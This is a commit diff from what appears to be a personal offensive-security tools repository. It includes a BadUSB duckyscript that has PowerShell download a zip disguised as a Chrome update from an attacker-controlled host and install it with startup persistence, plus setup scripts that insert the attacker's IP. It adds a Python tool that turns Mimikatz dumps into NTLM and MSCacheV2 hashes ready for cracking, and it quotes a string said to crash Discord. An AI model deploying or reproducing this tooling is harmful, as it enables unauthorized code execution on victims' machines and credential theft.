Creation of Katz^2

Reflect non-functionality

Duckyscripts/GooseDropper/GooseDropper.txt

@@ -4,7 +4,7 @@ REM DESCRIPTION Grab the Desktop Goose executable from an attacker machine and r
 DELAY 500
 GUI r
 DELAY 500
-STRING powershell wget YOUR_IP:1337/Chrome_Update.zip -OutFile $ENV:Temp/Update.zip
+STRING powershell wget YOUR_IP/ZIP -OutFile $ENV:Temp/Update.zip
 ENTER
 DELAY 8000
 GUI r

Duckyscripts/GooseDropper/README.md

@@ -2,24 +2,8 @@
 
 This is a duckyscript originally designed for Flipper-Zero to drop Desktop Goose (by Samperson) on a Windows PC. **NOW WITH PERSISTENCE**
 
-------------------------------------------------------------------------------------------------------
-
-Currently there is no auto-configurator for Windows but it's in the works. Steps to configure manually:
-    
-    1) Replace the YOUR_IP value in GooseDropper.txt with your IP.
-    
-    2) Download Desktop Goose and extract it, rename the 'DesktopGoose v.031' folder from inside the zip to Update.
-
-    3) Copy PersistentGoose.ps1 into the newly renamed Update folder.
-   
-    4) Re-ZIP the Update directory and name it Chrome_Updater.
-    
-    5) Start some form of simple webserver/fileshare on port 1337 (or change the port to reflect your choice).
-    
-    6) Copy to your Flipper or Rubber-Ducky and PWN!
 
 --------------------------------------------------------------------------------------------------------------
-
 **Important Notes:**
 
 Ensure configuration is run while on the same network as your target, re-configure with each new network, unless the download location provided is publicly accessible.
@@ -27,6 +11,15 @@ Ensure configuration is run while on the same network as your target, re-configu
 All credit goes to Samperson for the development of Desktop Goose: https://itch.io/profile/samperson | https://twitter.com/samnchiet
 
 **=== v2.0 Notes ==**
+    
     Added persistence via a PowerShell script that makes a shortcut in the startup folder.
+    
     Revamped updater with more options and better dialogue. 
+    
     Bugfixes to ensure payloads get delivered successfully.
+
+**=== v2.1 Notes ==**
+    
+    Simplified configurators to remove unnecessary complexity
+    
+    Added Windows auto-configuration tool.

Duckyscripts/GooseDropper/linux_setup.sh

@@ -1,90 +1,31 @@
 #!/bin/bash
 
-#Determine the source of the DesktopGoose download
+IP=$1
-echo "1) Local Webserver | 2) Persistant URL"
+ZIP=$2
+PERSIST=$3
 
-read -p "Select a download source [1/2]: " DL
+#Ensure required arguments are not empty
-
+if [ "${IP}" == "" ] | [ "${ZIP}" == "" ];
-if [ "${DL}" == "1" ];
 then
-	echo "Grabbing your IP"
+  echo "Usage: sh linux_setup.sh <IP_Address/URL> <path_to_desktop_goose.zip> <persist y/n>"
-
+  exit
-	#Grab your local IP to add to the payload
-	SRC="$(ip route show | grep default | cut -d ' ' -f 9)"
-	
-	#Add your IP to the payload
-	sed -i "s/YOUR_IP/$SRC/" GooseDropper.txt
-	
-	sleep 5s && clear
-
-elif [ "${DL}" == "2" ];
-then
-	#Get your URL
-	read -p "Enter your URL: " SRC
-	SRC="$(echo "$SRC" | sed 's/\//\\\//g')"
-	#Add your URL to the payload
-	sed -i "s/powershell wget YOUR_IP:1337\/Chrome_Update.zip -OutFile \$ENV:Temp\/Update.zip/powershell \"wget \'${SRC}\' -OutFile \$ENV:Temp\/Update.zip\"/" GooseDropper.txt
-	
-	#Remind users to have the zip ready
-	echo "Please ensure a ZIP file with proper contents and formatting is hosted at the provided URL"
-
-	sleep 5s && clear
-
-else
-	echo "Please enter a valid selection"
-	exit
-
 fi
 
-read -p "Create ZIP file to deliver Desktop Goose? [Y/N]: " COMP
+#Check for help command
-
+if [ "${IP,,}" == "-h" ] | [ "${IP,,}" == "help" ];
-#Check if Desktop Goose is present in this directory
-GOOSE="$(ls | grep 'Desktop Goose v0.31.zip')"
-
-if [ "${COMP,,}" == "y" ];
 then
-
+  echo "Usage: sh linux_setup.sh <IP_Address/URL> <path_to_desktop_goose.zip> <persist y/n>"
-	if [ "${GOOSE}" == "" ];
+  exit
-	then
-		echo "Desktop Goose is not present in this directory, download it, or move it here"
-		exit
-
-	else
-		unzip "Desktop Goose v0.31.zip"
-		mv "Desktop Goose v0.31/DesktopGoose v0.31" Update
-		mv PersistentGoose.ps1 Update/
-		zip -r Chrome_Update.zip Update
-		rm -rf "Desktop Goose v0.31"* Update
-		clear
-	fi
-else
-	break
 fi
 
-read -p "Configure Persistence? [Y/N]: " PERSIST
+#Replace placeholders with provided values
+sed -i "s/YOUR_IP/$IP/" GooseDropper.txt
+sed -i "s/ZIP/$ZIP/" GooseDropper.txt
 
+#Remove persistance if desired
 if [ "${PERSIST,,}" == "n" ];
 then
 	sed -i "15d;16d;17d;18d;19d" GooseDropper.txt
 else
 	break
 fi
-
-if [ "${DL}" == "1" ];
-then
-	clear
-	read -p "Configuration finished! Start python webserver now? [Y/N]: " START
-	clear
-else
-	clear
-	break
-fi
-
-if [ "${START,,}" == "y" ];
-then
-	echo "Starting Server... Happy PWNing! (don't be a skid)"
-	python3 -m http.server 1337 && echo "PWNED!"
-else
-	clear
-	echo "Finished... Happy PWNing! (don't be a skid)!"
-fi

Duckyscripts/GooseDropper/windows_setup.ps1

@@ -0,0 +1,30 @@
+param (
+    [string]$HELP,
+    [string]$IP,
+    [string]$ZIP,
+    [string]$PERSIST
+)
+
+# Ensure required arguments are not empty
+if (-not $IP -or -not $ZIP) {
+    Write-Host "Usage: .\windows_setup.ps1 <IP_Address/URL> <path_to_desktop_goose.zip> <persist y/n>"
+    exit
+}
+
+# Check for help command
+if ($HELP) {
+    Write-Host "Usage: .\windows_setup.ps1 <IP_Address/URL> <path_to_desktop_goose.zip> <persist y/n>"
+    exit
+}
+
+# Replace placeholders with provided values
+(Get-Content "GooseDropper.txt") | ForEach-Object { $_ -replace 'YOUR_IP', $IP -replace 'ZIP', $ZIP } | Set-Content "GooseDropper.txt"
+
+# Remove persistence if desired
+if ($PERSIST.ToLower() -eq "n") {
+    $lines = Get-Content "GooseDropper.txt"
+    $lines = $lines[0..14] + $lines[19..($lines.Length - 1)]
+    Set-Content "GooseDropper.txt" $lines
+} else {
+    break
+}

Duckyscripts/Kill_Discord/README.txt

@@ -1,3 +1,6 @@
+# This specific "Exploit" has been patched and is no-longer usable.
+---
+
 Kill_Discord is a duckyscript that does exactly what the name implies.
 
 As of April 2024 the string "http://./\<#0>:  ://./<#0>" without the quotes will crash your Discord client when pasted into any message box.

README.md

@@ -0,0 +1,6 @@
+# Misadventures
+This is a set of Red and Purple team tools I've developed, mostly just for fun, but some may find them useful.
+
+Feel free to leave tips, comments, or suggestion in the comments, on my website at https://fr3ki.xyz or my twitter @Fr3ki_
+
+Licence: https://www.gnu.org/licenses/gpl-3.0.html

katz2/README.md

@@ -0,0 +1,14 @@
+# Katz^2
+Katz Squared is a small python parser for Mimikatz log files, allowing for username/hash combos to be written to txt files, ready for use with Hashcat (you get the joke yet?) or John.
+
+---
+
+Usage: `katz2.py [-h] -f/--file -m/--mode`
+-
+**Modes:** 
+ - logonpasswords - Used for files containing the output of the mimikatz module of the same name.
+ - cache -- Used for files containing the output of the lsadump::cache mimikatz module
+ ---
+ **License:**
+ 
+ GPLv3 as all good software should be.

katz2/katz2.py

@@ -0,0 +1,68 @@
+import argparse
+
+parser = argparse.ArgumentParser()
+parser.add_argument("-f", "--file", help="Mimikatz output file", required=True)
+parser.add_argument("-m", "--mode", help="Mimikatz mode used to obtain the output logonpasswords|cache", required=True)
+args = parser.parse_args()
+
+def dump(creds):
+    if isinstance(creds, list) and len(creds) >= 2:
+        username = creds[0]
+        hsh = creds[1]
+        dumpfile = username+".txt"
+        with open(dumpfile, "w+") as df:
+            df.write(hsh)
+    else:
+        pass
+
+def sekurlsa():
+    filename = args.file
+    creds = []
+    with open(filename) as f:
+        for line in f:
+            if "authentication" in line.lower():
+                dump(creds)
+                creds = []
+            elif "username" in line.lower():
+                username = line.split(":")[1].strip()
+                if username.lower() in creds or username.lower() == "(null)":
+                    pass
+                else:
+                    creds.append(username.lower())
+            elif "ntlm" in line.lower():
+                ntlm = line.strip().split(":")[1].strip()
+                if ntlm in creds:
+                    pass
+                else:
+                    creds.append(ntlm)
+
+def cache():
+    filename = args.file
+    creds = []
+    with open(filename) as f:
+        for line in f:
+            if "nl$" in line.lower():
+                print(creds)
+                dump(creds)
+                creds = []
+            elif "user" in line.lower():
+                username = line.split(":")[1].strip()
+                if username.lower() in creds or username.lower() == "(null)":
+                    pass
+                else:
+                    creds.append(username.lower())
+            elif "mscachev2" in line.lower():
+                mscache = line.strip().split(":")[1].strip()
+                if mscache in creds:
+                    pass
+                else:
+                    creds.append(mscache)
+
+    print("[+] Credential pairs written to disk")
+
+if __name__ == "__main__":
+    match args.mode:
+        case "logonpasswords":
+            sekurlsa()
+        case "cache":
+            cache()